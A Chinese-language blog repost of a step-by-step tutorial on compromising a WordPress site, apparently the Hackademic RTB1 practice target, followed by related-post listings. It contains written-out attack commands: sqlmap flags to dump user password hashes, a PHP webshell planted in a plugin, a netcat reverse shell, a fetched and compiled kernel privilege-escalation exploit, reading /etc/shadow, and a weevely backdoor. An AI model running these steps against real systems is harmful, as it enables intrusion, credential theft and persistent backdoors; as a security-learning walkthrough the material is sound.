【图文】黑客如何攻破一个网站?

转载 2018年04月17日 00:00:00

转自:华盟网

原文:http://resources.infosecinstitute.com/hacking-a-wordpress-site/


黑客如何攻破一个网站?图文讲解全流程》主要分享了网友对黑客攻击目标网站进行 SEO 黑链处理的战争,本文将用图文讲解黑客攻破网站全流程

PS:一篇科普文,很适合小白,长文请静下心看。


通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容:

  1. 渗透测试前的简单信息收集。

  2. sqlmap的使用

  3. nmap的使用

  4. nc反弹提权

  5. linux系统的权限提升

  6. backtrack 5中渗透测试工具nikto和w3af的使用等


假设黑客要入侵的你的网站域名为:hack-test.com


让我们用ping命令获取网站服务器的IP地址

现在我们获取了网站服务器的IP地址为:173.236.138.113


寻找同一服务器上的其它网站,我们使用sameip.org.

26 sites hosted on IP Address 173.236.138.113


ID

Domain

Site Link

1

hijackthisforum.com

hijackthisforum.com

2

sportforum.net

sportforum.net

3

freeonlinesudoku.net

freeonlinesudoku.net

4

cosplayhell.com

cosplayhell.com

5

videogamenews.org

videogamenews.org

6

gametour.com

gametour.com

7

qualitypetsitting.net

qualitypetsitting.net

8

brendanichols.com

brendanichols.com

9

8ez.com

8ez.com

10

hack-test.com

hack-test.com

11

kisax.com

kisax.com

12

paisans.com

paisans.com

13

mghz.com

mghz.com

14

debateful.com

debateful.com

15

jazzygoodtimes.com

jazzygoodtimes.com

16

fruny.com

fruny.com

17

vbum.com

vbum.com

18

wuckie.com

wuckie.com

19

force5inc.com

force5inc.com

20

virushero.com

virushero.com

21

twincitiesbusinesspeernetwork.com

twincitiesbusinesspeernetwork.com

22

jennieko.com

jennieko.com

23

davereedy.com

davereedy.com

24

joygarrido.com

joygarrido.com

25

prismapp.com

prismapp.com

26

utiligolf.com

utiligolf.com

173.236.138.113上有26个网站,很多黑客为了攻破你的网站可能会检查同服务器上的其它网站,但是本次是以研究为目标,我们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。


我们需要关于你网站的以下信息:

  1. DNS records (A, NS, TXT, MX and SOA)

  2. Web Server Type (Apache, IIS, Tomcat)

  3. Registrar (the company that owns your domain)

  4. Your name, address, email and phone

  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)

  6. Your server OS (Unix,Linux,Windows,Solaris)

  7. Your server open ports to internet (80, 443, 21, etc.)


让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.

我们发现你的DNS记录如下

让我们来确定web服务器的类型

发现你的Web服务器是apache,接下来确定它的版本.

IP: 173.236.138.113

Website Status: active

Server Type: Apache

Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753

Page Views per Visit: 1 Month: 2.0 3Month: 3.7

接下来是时候寻找你网站域名的注册信息,你的电话、邮箱、地址等.

我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.

我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:

1-Find services that run on server(查看服务器上运行的服务)

2-Find server OS(查看操作系统版本)

只有80端口是开放的,操作系统是Linux2.6.22(Fedora Core 6),现在我们已经收集了所有关于你网站的重要信息,接下来开始扫描寻找漏洞,比如:

Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.

我们将使用Nikto来收集漏洞信息:

root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com

我们也会用到Backtrack 5 R1中的W3AF 工具:

root@bt:/pentest/web/w3af#./w3af_gui

我们输入要检测的网站地址,选择完整的安全审计选项.

稍等一会,你将会看到扫描结果.

发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.

Using sqlmap with –u url

过一会你会看到

输入N按回车键继续

我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.

发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

通过参数“-T wp_users –columns ”来查看wp_users表中的字段.

接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”

我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes

http://www.onlinehashcrack.com/free-hash-reverse.php

登陆wordpress的后台wp-admin

尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.

Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。

我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.

点击连接我们会看到

接下来我们尝试执行一些命令:

id

uid=48(apache) gid=489(apache) groups=489(apache)

(用来显示用户的id和组)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

(显示服务器上当前的路径)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

(显示内核版本信息)

现在我们知道,服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com中搜索此版本的相关漏洞.

在服务器上测试了很多exp之后,我们用以下的exp来提升权限.

http://www.exploit-db.com/exploits/15285

我们在nc shell上执行以下命令:

wgethttp://www.exploit-db.com/exploits/15285 -o roro.c

(下载exp到服务器并重命名为roro.c)

注:很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.

exp roro.c代码如下:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf(“[*] Could not open socket.”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));


通过以上代码我们发现该exp是C语言开发的,我们需要将他编译成elf格式的,命令如下:

gcc roro.c –ororo

接下来执行编译好的exp

./roro

执行完成之后我们输入id命令

id

我们发现我们已经是root权限了

uid=0(root) gid=0(root)

现在我们可以查看/etc/shadow文件

cat/etc/shadow

我们可以使用”john theripper”工具破解所有用户的密码.但是我们不会这样做,我们需要在这个服务器上留下后门以方便我们在任何时候访问它.

我们用weevely制作一个php小马上传到服务器上.

1.weevely使用选项

root@bt:/pentest/backdoors/web/weevely#./main.py -

2.用weevely创建一个密码为koko的php后门

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

接下来上传到服务器之后来使用它

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

测试我们的hax.php后门

完成,撒花!


推荐阅读:

关于网络钓鱼的深入讨论

入侵320所大学窃取34亿资料,9名伊朗黑客被美国政府制裁

县城少年黑客互联网犯罪史

用一张GIF图片挂起网站



网络营销-网站盈利方式/淘宝客网络赚钱/广告联盟

课程简单易懂,学习本课,个人看完能学会使用淘宝客赚钱,网站主看完能使用阿里妈妈广告联盟赚取佣金,给自己网站增加收入。学会广告联盟的相关知识,学会如何区分网络骗局。介绍自己以往使用过的推广方式,提升你的推广思路。
  • 2016年05月17日 11:40

【图文】黑客如何攻破一个网站?

转自:华盟网原文:http://resources.infosecinstitute.com/hacking-a-wordpress-site/《黑客如何攻破一个网站?图文讲解全流程》主要分享了网友对...
  • xCnhYKoHj3eK
  • xCnhYKoHj3eK
  • 2018-04-17 00:00:00
  • 77

中国黑客首次攻破Win10系统!微软惊呆

收藏文章 分享到 评论(69) 路人甲:说一个笑话吧。 路人乙:Windows很安全。 路人甲+路人乙:哈哈哈哈哈 为了让这样的笑话成为历史,微软拼了。不要小看Wind...
  • aaca12138
  • aaca12138
  • 2015-11-08 12:43:12
  • 210

【网络黑客所谓的盗号,带你解密!】

转自:皮鲁安全之家(ID:piluwill)早期的盗取号的方法主要有两种:第一种:本地机器种木马这是极为普遍的一种方法,而且很简单,只要您能有一个木马就行,这种软件可以说遍地都是,数量很多,随便到哪个...
  • xCnhYKoHj3eK
  • xCnhYKoHj3eK
  • 2018-01-18 00:00:00
  • 1153

加强、提升SSL的密钥位数防止被黑客攻破

安全套接层(SSL)被用于保护无数的网络用户,但是它有什么弱点呢?最近几年出现了许多专门攻击SSL的攻击。虽然这个技术实际上还是比较安全的,但是攻击者一直在寻找漏洞绕过安全协议和标准。其中SSL是他们...
  • zhengdanqi
  • zhengdanqi
  • 2014-10-31 17:49:11
  • 713

再见,黑客江湖

32岁的傅明供职于国内一家著名的杀毒软件公司。他长相平平,说话拘谨,一副标准的计算机程序员形象。只有聊起黑客时,才会挂起一抹不屑的微笑,属于高手的微笑。 他曾是一名叱咤风云的计算机黑客,参加过数次所...
  • JavaAlpha
  • JavaAlpha
  • 2013-01-23 17:41:33
  • 1821

网络钓鱼攻击

网络钓鱼攻击常用方法  钓鱼攻击使用多种技术,使一封电子邮件信息或网页的显示同其运行表现出欺骗性差异。下面列出了一些较为常见攻击技术……# 一、发送电子邮件,以虚假信息引诱用户中圈套# 二、建立假冒网...
  • iiprogram
  • iiprogram
  • 2007-06-24 16:03:00
  • 1574

破解无线路由器,获得微信等上网信息

翻到一个帖子,感觉很有用,因此转载到博客,有利于提高安全意识。       都是年轻人,肯定少不了无线路由器,搜到隔壁的信号无压力,黑进去再说!这是我的第一个念头。   打开WiFi,搜到...
  • win_in_action
  • win_in_action
  • 2015-01-21 14:39:03
  • 6587

黑客是怎样入侵你的网站的

http://www.2cto.com/Article/201302/189735.html 这个问题很难回答,简单的来说,入侵一个网站可以有很多种方法。本文的目的是展示黑客们常用的扫描和入...
  • loongwong2011
  • loongwong2011
  • 2016-08-11 18:01:50
  • 3171

2017全球最惊心动魄的12个网络安全事件

过去的2017年,对于全球互联网用户来说无疑是惊心动魄的一年。在这一年里,伴随永恒之蓝出现的勒索病毒席卷全球、美国中情局绝密文件被泄露、乌克兰遭黑客围攻……尤其是WannaCry在全球范围的高调出镜,...
  • FnqTyr45
  • FnqTyr45
  • 2018-01-21 00:00:00
  • 592
收藏助手
不良信息举报
您举报文章:【图文】黑客如何攻破一个网站?
举报原因:
原因补充:

(最多只允许输入30个字)